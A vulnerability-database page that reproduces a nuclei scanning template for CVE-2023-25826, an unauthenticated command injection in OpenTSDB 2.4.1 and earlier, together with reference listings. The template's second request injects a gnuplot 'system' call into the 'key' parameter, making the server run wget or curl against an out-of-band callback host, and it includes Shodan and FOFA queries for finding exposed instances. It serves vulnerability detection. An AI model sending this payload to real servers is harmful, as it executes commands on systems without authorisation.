Lucene search
+L

OpenTSDB <= 2.4.1 - Unauthenticated RCE via Gnuplot Injection

🗓️ 14 Sep 2026 05:13:46Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Unauthenticated RCE in OpenTSDB <= 2.4.1 via Gnuplot command injection.

Related
Refs
Code
ReporterTitlePublishedViews
Family
zdt
zdt
OpenTSDB 2.4.1 Unauthenticated Command Injection Exploit
11 Sep 202300:00
zdt
githubexploit
GithubExploit
Exploit for OS Command Injection in Opentsdb
7 Sep 202313:47
githubexploit
circl
Circl
CVE-2023-25826
3 May 202322:31
circl
cnnvd
CNNVD
OpenTSDB 操作系统命令注入漏洞
3 May 202300:00
cnnvd
cve
CVE
CVE-2023-25826
3 May 202318:33
cve
cvelist
Cvelist
CVE-2023-25826 Remote Code Execution in OpenTSDB
3 May 202318:33
cvelist
github
Github Security Blog
Command injection in OpenTSDB
3 May 202321:30
github
kitploit
Kitploit
opentsdb_key_cmd_injection
13 Sep 202623:58
kitploit
metasploit
Metasploit
OpenTSDB 2.4.1 unauthenticated command injection
1 Jul 202300:00
metasploit
nvd
NVD
CVE-2023-25826
3 May 202319:15
nvd
Rows per page
id: CVE-2023-25826

info:
  name: OpenTSDB <= 2.4.1 - Unauthenticated RCE via Gnuplot Injection
  author: aryu-ru
  severity: critical
  description: |
    OpenTSDB contains a command injection caused by insufficient validation of parameters passed to the legacy HTTP query API, letting attackers inject crafted OS commands and execute malicious code, exploit requires sending crafted parameters.
  impact: |
    Attackers can execute arbitrary OS commands on the host system, potentially leading to full system compromise.
  remediation: |
    Implement comprehensive input validation and update to the latest version that addresses this issue.
  reference:
    - https://github.com/OpenTSDB/opentsdb/pull/2275
    - https://github.com/vulhub/vulhub/blob/master/opentsdb/CVE-2023-25826/README.md
    - http://packetstormsecurity.com/files/174570/OpenTSDB-2.4.1-Unauthenticated-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25826
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-25826
    epss-score: 0.42765
    epss-percentile: 0.98636
    cwe-id: CWE-78
  metadata:
    verified: true
    max-request: 2
    vendor: opentsdb
    product: opentsdb
    shodan-query: http.favicon.hash:407286339
    fofa-query: title="OpenTSDB"
  tags: cve,cve2023,opentsdb,rce,oast,unauth,packetstorm

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /api/suggest?type=metrics&q=&max=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "application/json")
          - contains(body, "[\"")
          - '!contains(body, "<html")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: metric
        part: body
        group: 1
        regex:
          - '^\["([^"]+)"'
        internal: true

  - raw:
      - |
        GET /q?start=1h-ago&m=sum:{{metric}}&key=out%20right%20top%0asystem%20%22wget%20-q%20-T%205%20-O%20/dev/null%20http://{{interactsh-url}}%20%7C%7C%20curl%20-sk%20--max-time%205%20http://{{interactsh-url}}%22&json HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_any(interactsh_protocol, "http", "dns")
          - contains_all(body, "plotted", "points", "etags")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100c4b65cdeb940d76f54baeab1a76764d4b23db8a2f82d71c5d27f434a18deea40022100d2af633a9612ceb7e222f3dd06cd449b49bc96dee7b663a9ce0f13465e515ea2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Aug 2026 06:51Current
8.2High risk
Vulners AI Score8.2
CVSS 3.19.8
EPSS0.42765
SSVC
10